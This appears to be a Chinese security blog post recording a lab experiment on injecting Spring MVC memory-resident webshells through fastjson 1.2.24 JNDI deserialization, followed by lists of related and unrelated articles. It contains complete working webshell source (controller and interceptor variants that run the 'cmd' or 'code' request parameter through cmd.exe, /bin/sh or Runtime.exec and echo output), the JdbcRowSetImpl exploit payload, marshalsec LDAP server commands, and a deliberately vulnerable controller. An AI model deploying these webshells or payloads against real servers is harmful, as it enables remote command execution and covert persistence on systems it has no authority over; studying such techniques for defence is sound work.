此篇文章在于记录自己对spring内存马的实验研究

一、环境搭建

搭建漏洞环境,利用fastjson反序列化,通过JNDI下载恶意的class文件,触发恶意类的构造函数中代码,注入controller内存马。

1)组件版本:

fastjson: 1.2.24

spring-mvc: 4.3.28.RELEASE

JDK: 8u121

2)搭建springMVC+fastjson漏洞环境

可以参考网上的入门文章进行搭建,这里我放出我自己环境的配置文件

web.xml

  <servlet>

    <servlet-name>SpringMVC</servlet-name>

    <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>

    <!--配置springmvc.xml的路径-->

    <init-param>

      <param-name>contextConfigLocation</param-name>

      <param-value>classpath:springmvc.xml</param-value>

    </init-param>

  </servlet>

  <servlet-mapping>

    <servlet-name>SpringMVC</servlet-name>

    <url-pattern>/</url-pattern>

  </servlet-mapping>

</web-app>

springmvc.xml

<!--将AnnotationHandler自动扫描到IOC容器中-->

    <context:component-scan base-package="test.controller"></context:component-scan>

    <mvc:annotation-driven/>

    <!--配置视图解析器-->

    <bean class="org.springframework.web.servlet.view.InternalResourceViewResolver">

        <!--配置前缀-->

        <property name="prefix" value="/"></property>

        <!--配置后缀-->

        <property name="suffix" value=".jsp"></property>

    </bean>

</beans>

HelloController

@Controller

public class HelloController {

    @ResponseBody

    @RequestMapping(value = "/hello", method = RequestMethod.POST)

    public Object hello(@RequestParam("code")String code) throws Exception {

        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

        System.out.println(code);

        Object object = JSON.parse(code);

        return code + "->JSON.parseObject()->" + object;

    }

}

pom.xml

<dependency>

  <groupId>com.alibaba</groupId>

  <artifactId>fastjson</artifactId>

  <version>1.2.24</version>

</dependency>

<dependency>

  <groupId>junit</groupId>

  <artifactId>junit</artifactId>

  <version>4.11</version>

  <scope>test</scope>

</dependency>

<!--SpringMVC依赖-->

<dependency>

  <groupId>org.springframework</groupId>

  <artifactId>spring-webmvc</artifactId>

  <version>4.3.28.RELEASE</version>

</dependency>

二、动态注册controller

在springMVC中,也可以在服务器程序启动后,利用某种方式实现动态加载controller。

1)获取上下文

LandGrey文章中介绍了四种方法,分别是

方式一:getCurrentWebApplicationContext

WebApplicationContext context = ContextLoader.getCurrentWebApplicationContext();

方法二:WebApplicationContextUtils

WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());

方法三:RequestContextUtils

WebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());

方法四:getAttribute

WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

而对于获取上下文来说,推荐使用第三、四种方法。前两种可能会获取不到RequestMappingHandlerMapping实例

2)注册controller

使用registerMapping方法来动态注册我们的恶意controller

// 1. 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean

RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);

// 2. 通过反射获得自定义 controller 中唯一的 Method 对象

Method method = (Class.forName("me.landgrey.SSOLogin").getDeclaredMethods())[0];

// 3. 定义访问 controller 的 URL 地址

PatternsRequestCondition url = new PatternsRequestCondition("/hahaha");

// 4. 定义允许访问 controller 的 HTTP 方法(GET/POST)

RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();

// 5. 在内存中动态注册 controller

RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);

r.registerMapping(info, Class.forName("me.landgrey.SSOLogin").newInstance(), method);

除了使用registerMapping方法注册controller外,还有其余的方式可以参考https://landgrey.me/blog/12/

三、内存马

以下是大佬的内存马,接下来进行一个改动,使之能进行回显

import org.springframework.web.context.WebApplicationContext;

import org.springframework.web.context.request.RequestContextHolder;

import org.springframework.web.context.request.ServletRequestAttributes;

import org.springframework.web.servlet.handler.AbstractHandlerMethodMapping;

import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;

import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;

import org.springframework.web.servlet.mvc.method.RequestMappingInfo;

import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.lang.reflect.Field;

import java.lang.reflect.InvocationTargetException;

import java.lang.reflect.Method;

import java.util.ArrayList;

import java.util.Iterator;

import java.util.List;

import java.util.Map;

public class InjectToController {

    // 第一个构造函数

    public InjectToController() throws ClassNotFoundException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, InvocationTargetException {

        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

        // 1. 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean

        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

        // 2. 通过反射获得自定义 controller 中test的 Method 对象

        Method method2 = InjectToController.class.getMethod("test");

        // 3. 定义访问 controller 的 URL 地址

        PatternsRequestCondition url = new PatternsRequestCondition("/malicious");

        // 4. 定义允许访问 controller 的 HTTP 方法(GET/POST)

        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();

        // 5. 在内存中动态注册 controller

        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);

        // 创建用于处理请求的对象,加入“aaa”参数是为了触发第二个构造函数避免无限循环

        InjectToController injectToController = new InjectToController("aaa");

        mappingHandlerMapping.registerMapping(info, injectToController, method2);

    }

    // 第二个构造函数

    public InjectToController(String aaa) {}

	// controller指定的处理方法

    public void test() throws  IOException{

        // 获取request和response对象

        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();

        // 获取cmd参数并执行命令

        java.lang.Runtime.getRuntime().exec(request.getParameter("cmd"));

    }

}

修改回显

把test代码中的内容替换为以下

// 获取request和response对象

HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();

//exec

try {

    String arg0 = request.getParameter("cmd");

    PrintWriter writer = response.getWriter();

    if (arg0 != null) {

        String o = "";

        java.lang.ProcessBuilder p;

        if(System.getProperty("os.name").toLowerCase().contains("win")){

            p = new java.lang.ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});

        }else{

            p = new java.lang.ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});

        }

        java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");

        o = c.hasNext() ? c.next(): o;

        c.close();

        writer.write(o);

        writer.flush();

        writer.close();

    }else{

        //当请求没有携带指定的参数(code)时,返回 404 错误

        response.sendError(404);

    }

}catch (Exception e){}

最终内存马

import org.springframework.web.context.WebApplicationContext;

import org.springframework.web.context.request.RequestContextHolder;

import org.springframework.web.context.request.ServletRequestAttributes;

import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;

import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;

import org.springframework.web.servlet.mvc.method.RequestMappingInfo;

import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.io.PrintWriter;

import java.lang.reflect.InvocationTargetException;

import java.lang.reflect.Method;

public class InjectToController {

    // 第一个构造函数

    public InjectToController() throws ClassNotFoundException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException, InvocationTargetException {

        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

        // 1. 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean

        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

        // 2. 通过反射获得自定义 controller 中test的 Method 对象

        Method method2 = InjectToController.class.getMethod("test");

        // 3. 定义访问 controller 的 URL 地址

        PatternsRequestCondition url = new PatternsRequestCondition("/malicious");

        // 4. 定义允许访问 controller 的 HTTP 方法(GET/POST)

        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();

        // 5. 在内存中动态注册 controller

        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);

        // 创建用于处理请求的对象,加入“aaa”参数是为了触发第二个构造函数避免无限循环

        InjectToController injectToController = new InjectToController("aaa");

        mappingHandlerMapping.registerMapping(info, injectToController, method2);

    }

    // 第二个构造函数

    public InjectToController(String aaa) {}

    // controller指定的处理方法

    public void test() throws  IOException{

        // 获取request和response对象

        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();

        //exec

        try {

            String arg0 = request.getParameter("cmd");

            PrintWriter writer = response.getWriter();

            if (arg0 != null) {

                String o = "";

                java.lang.ProcessBuilder p;

                if(System.getProperty("os.name").toLowerCase().contains("win")){

                    p = new java.lang.ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});

                }else{

                    p = new java.lang.ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});

                }

                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");

                o = c.hasNext() ? c.next(): o;

                c.close();

                writer.write(o);

                writer.flush();

                writer.close();

            }else{

                //当请求没有携带指定的参数(code)时,返回 404 错误

                response.sendError(404);

            }

        }catch (Exception e){}

    }

}

四、测试

fastjson<=1.2.24的 payload:

{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"%s","autoCommit":true}}

1)启动本地http服务,绑定端口8888

python3 -m http.server 8888

2)利用marshalsec启动LDAP服务,绑定端口9999

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#InjectToController 9999

3)访问存在fastjson反序列化的页面,http://localhost:8080/hello

发送payload:

{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:9999/InjectToControlle","autoCommit":true}}

成功写入内存马

踩坑

在实验过程中,我发现主要有两个比较难解决的点,导致实验难以继续

1.怎么编译恶意class文件

可以看到,一个恶意类是有大量的依赖,如果直接采用javac编译会报错

-》javac InjectToController.java

InjectToController.java:16: 错误: 编码GBK的不可映射字符

    // 绗竴涓瀯閫犲嚱鏁?

                 ^

InjectToController.java:19: 错误: 编码GBK的不可映射字符

        // 1. 浠庡綋鍓嶄笂涓嬫枃鐜涓幏寰? RequestMappingHandlerMapping 鐨勫疄渚? bean

                              ^

InjectToController.java:19: 错误: 编码GBK的不可映射字符

        // 1. 浠庡綋鍓嶄笂涓嬫枃鐜涓幏寰? RequestMappingHandlerMapping 鐨勫疄渚? bean

                                                                 ^

这时候可以利用idea自带的编译特性,先运行项目,然后在其项目的target目录中寻找编译后的class文件即可

2.可以弹出计算器,却无法注入内存马

直接进行debug后发现,在这一行代码会因为找不到RequestMappingHandlerMapping 的实例 bean而抛出异常

原因在于springmvc.xml文件中,没有开启<mvc:annotation-driven/>选项。

<mvc:annotation-driven/> 是为 MVC 提供额外的支持,参考 Spring 的官方文档<mvc:annotation-driven/> 最主要的作用是注册 HandlerMapping(实现为 DefaultAnnotationHandlerMapping) 和 HandlerAdapter(实现为 AnnotationMethodHandlerAdapter) 两个类型的 Bean,这两个 Bean 为 @Controllers(所有控制器) 提供转发请求的功能。

而在Spring 3.1 开始及以后一般开始使用了新的RequestMappingHandlerMapping映射器。

五、后记

Interceptor内存马

其实不光是可以注入controller型的内存马,还可以注入Interceptor内存马

import org.springframework.web.context.WebApplicationContext;

import org.springframework.web.context.request.RequestContextHolder;

import org.springframework.web.servlet.handler.HandlerInterceptorAdapter;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

public class TestInterceptor extends HandlerInterceptorAdapter {

    public TestInterceptor() throws NoSuchFieldException, IllegalAccessException, InstantiationException {

        // 获取context

        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

        // 从context中获取AbstractHandlerMapping的实例对象

        org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = (org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean("org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping");

        // 反射获取adaptedInterceptors属性

        java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");

        field.setAccessible(true);

        java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>)field.get(abstractHandlerMapping);

        // 避免重复添加

        for (int i = adaptedInterceptors.size() - 1; i > 0; i--) {

            if (adaptedInterceptors.get(i) instanceof TestInterceptor) {

                System.out.println("已经添加过TestInterceptor实例了");

                return;

            }

        }

        TestInterceptor aaa = new TestInterceptor("aaa");  // 避免进入实例创建的死循环

        adaptedInterceptors.add(aaa);  //  添加全局interceptor

    }

    private TestInterceptor(String aaa){}

    @Override

    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {

        String code = request.getParameter("code");

        // 不干扰正常业务逻辑

        if (code != null) {

            java.lang.Runtime.getRuntime().exec(code);

            return true;

        }

        else {

            return true;

        }}}

注册效果:

六、参考

https://landgrey.me/blog/12/

https://www.cnblogs.com/bitterz/p/14820898.html

https://www.cnblogs.com/bitterz/p/14859766.html

利用Fastjson注入Spring内存马的更多相关文章

  1. Java安全之Spring内存马

    Java安全之Spring内存马 基础知识 Bean bean 是 Spring 框架的一个核心概念,它是构成应用程序的主干,并且是由 Spring IoC 容器负责实例化.配置.组装和管理的对象. ...

  2. 针对Spring MVC的Interceptor内存马

    针对Spring MVC的Interceptor内存马 目录 针对Spring MVC的Interceptor内存马 1 基础拦截器和调用流程的探索 1.1 基础拦截器 1.2 探索拦截器的调用链 1 ...

  3. Weblogic下的servlet内存马注入-无参照纯调试

    目录 1.寻找servlet注入方法 1.1 调试 1.2 servletMapping添加servlet 2.获取request 2.1 从当前线程寻找信息 2.2 JNDI注入到内存马注入 3.关 ...

  4. Java Filter型内存马的学习与实践

    完全参考:https://www.cnblogs.com/nice0e3/p/14622879.html 这篇笔记,来源逗神的指点,让我去了解了内存马,这篇笔记记录的是filter类型的内存马 内存马 ...

  5. Java安全之Tomcat6 Filter内存马

    Java安全之Tomcat6 Filter内存马 回顾Tomcat8打法 先回顾下之前Tomcat789的打法 这里先抛开 7 8之间的区别, 在8中,最后add到filterchain的都是一个fi ...

  6. 利用shiro反序列化注入冰蝎内存马

    利用shiro反序列化注入冰蝎内存马 文章首发先知社区:https://xz.aliyun.com/t/10696 一.shiro反序列化注入内存马 1)tomcat filter内存马 先来看一个普 ...

  7. 针对spring mvc的controller内存马-学习和实验

    1 基础 实际上java内存马的注入已经有很多方式了,这里在学习中动手研究并写了一款spring mvc应用的内存马.一般来说实现无文件落地的java内存马注入,通常是利用反序列化漏洞,所以动手写了一 ...

  8. Spring_02 注入类型值、利用引用注入类型值、spring表达式、与类相关的注解、与依赖注入相关的注解、注解扫描

    注意:注入基本类型值在本质上就是依赖注入,而且是利用的set方式进行的依赖注入 1 注入基本类型的值 <property name="基本类型的成员变量名" value=&q ...

  9. tomcat内存马原理解析及实现

    内存马 简介 ​ Webshell内存马,是在内存中写入恶意后门和木马并执行,达到远程控制Web服务器的一类内存马,其瞄准了企业的对外窗口:网站.应用.但传统的Webshell都是基于文件类型的,黑客 ...

随机推荐

  1. Wireshark简单协议的抓包分析

    一.实验目的 HTTP.TCP.UDP.ICMP.ARP.IP.FTP.TELNET查询分析 基本掌握查询命令的使用方法 二.实验环境 硬件环境:一台Windows7系统,一台XP系统 软件环境:VM ...

  2. typora博客笔记上传图片时不能显示

    前言 markdown具有轻量化.易读易写等特性,并且对于图片.超链接.图片.数学公式都有支持. 但是最近在使用Typora的过程中我发现,在写文章笔记的时候导入的图片,因为图片保存在我们电脑本地,当 ...

  3. 题解 「SCOI2016」萌萌哒

    link Description 一个长度为 $ n $ 的大数,用 $ S_1S_2S_3 \ldots S_n $表示,其中 $ S_i $ 表示数的第 $ i $ 位,$ S_1 $ 是数的最高 ...

  4. Git浅析

    Git浅析 索引 Git的常用命令 GitHub的使用 Git版本创建和回退 Git的工作区和暂存区 Git分支管理 1-Git的常用命令 01.创建一个版本库--进入相应的目录 git init 可 ...

  5. 【二食堂】Beta - 测试报告

    Beta - 测试报告 测试过程中发现的bug Beta阶段的新bug 我们在Beta阶段的开发过程中就进行了测试,发现了许多bug.这其中后端的bug比较多,在这里我列举一些比较重要的功能性bug. ...

  6. [no code][scrum meeting] Beta 6

    $( "#cnblogs_post_body" ).catalog() 例会时间:5月19日11:30,主持者:黎正宇 下次例会时间:5月20日11:30,主持者:彭毛小民 一.工 ...

  7. 预备知识-python核心用法常用数据分析库(上)

    1.预备知识-python核心用法常用数据分析库(上) 目录 1.预备知识-python核心用法常用数据分析库(上) 概述 实验环境 任务一:环境安装与配置 [实验目标] [实验步骤] 任务二:Pan ...

  8. mbps和MB/s是怎么换算的

    Mbps即"传输速率",也叫"带宽".去营业厅开网线的时候会问开几兆的宽带,这里说的"几兆的宽带"就是指多少Mbps,但是Mbps和MB/s ...

  9. STM32时钟系统之利用 systick 定时器来实现准确的延时。

    本篇文章带着大家来认识一下 STM32 的时钟系统,以及利用 systick 定时器来实现一个比较准确的延时. 我们首先从时钟说起,时钟在MCU中的作用,就好比于人类的心脏一样不可或缺.STM32 的 ...

  10. Machine learning (8-Neural Networks: Representation)

    1.Non-linear Hypotheses 2.Neurons and the Brain 从某种意义上来说,如果我们能找出大脑的学习算法,然后在计算机上执行大脑学习算法或与之相似的算法,也许这将 ...